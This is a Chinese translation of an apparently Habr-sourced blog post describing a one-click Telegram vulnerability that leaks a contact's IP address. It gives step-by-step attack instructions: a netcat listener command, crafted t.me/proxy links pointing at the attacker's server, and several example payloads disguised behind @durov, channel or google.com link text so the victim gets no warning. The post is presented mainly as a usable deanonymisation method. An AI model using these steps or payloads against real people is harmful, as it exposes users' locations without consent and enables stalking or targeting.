来源: https://habr.com/ru/companies/femida_search/articles/983028/
Telegram 有一种方法可以一键显示联系人的 IP 地址,无需向他们发送任何文件或图片,甚至无需强迫他们点击可疑链接。
而且,当你点击陌生链接时,Telegram 也不会发出任何警告。
这是怎么做到的?
这是 Telegram 众多漏洞之一。
这是一个一键式漏洞,如果有人点击用户名、链接或文本,攻击者就能绕过所有代理,从而获取其 IP 地址。
该漏洞自 2023 年以来一直在 iOS 和 Android 系统上运行。
你需要以下步骤:
- 在您的服务器上打开一个监听端口。例如,使用 netcat 命令:
nc -lvnp<您的端口号> - 将链接替换为
https://t.me/proxy?server=8.8.8.8&port=1337格式 (此处填写您的服务器详细信息) - 将此链接粘贴为普通链接,例如:@durov
(https://t.me/proxy?server=8.8.8.8&port=1337 )或[https://google.com](https://google.com/)( https://t.me/proxy?server=8.8.8.8&port=1337 )
那么我们能得到什么呢?
当我们尝试点击这类链接时,Telegram 会立即向服务器发送数据包来检查代理的功能。Telegram 不会以任何方式警告我们这一点
,而我们只需点击一下,就会将自己的位置泄露给街上的陌生人。
Telegram可以保护自己免受这种侵害!是啊……它确实可以,对吧?
如果一个新账号给你发消息,消息里包含链接,这个链接是无法点击的。这看似可以防止误点,但实际上,这意味着需要几个小时的预热时间,而且账号必须干净且历史记录良好……这样,链接才能再次生效。
这些就是那种馅饼……
为什么会发生这种情况?
在安卓和iOS客户端上,添加代理前会自动启用代理自动ping功能;所有客户端在点击内部链接时都不会发出警告。代理链接(http://t.me/proxy)也被视为内部链接,因此点击该链接会自动显示您的IP地址。
也就是说,我们不会插入任何左手钓鱼链接,我们只会插入指向 Telegram 本身([http://t.me/proxy ](http://t.me/proxy)[?)及其服务的](http://t.me/proxy?))链接 ,因此不会收到来自 Telegram 的任何警告或消息。
例如 @durov(https://t.me/proxy?server=1.1.1.1&port=53)
https://t.me/femidasearch(https://t.me/proxy?server=1.1.1.1&port=53),https://t.me/durov)
[https://google.com](https://google.com/)(https://t.me/proxy?server=1.1.1.1&port=53)
等等。
启动 mtproxy,在 Telegram 链接或其他文本上方添加代理链接,等待片刻,检查 IP 连接日志,就完成了……
这些数据不属于我们,任何人都可以拥有 ![]()